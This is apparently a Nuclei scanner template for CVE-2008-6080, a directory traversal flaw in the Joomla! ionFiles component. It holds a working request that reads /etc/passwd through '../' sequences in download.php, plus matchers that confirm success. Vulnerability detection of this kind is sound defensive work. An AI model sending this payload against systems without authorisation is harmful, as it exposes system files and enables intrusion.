28 lines
783 B
YAML
28 lines
783 B
YAML
|
id: CVE-2008-6080
|
||
|
|
||
|
info:
|
||
|
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
|
||
|
author: daffainfo
|
||
|
severity: high
|
||
|
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/6809
|
||
|
- https://www.cvedetails.com/cve/CVE-2008-6080
|
||
|
tags: cve,cve2008,joomla,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|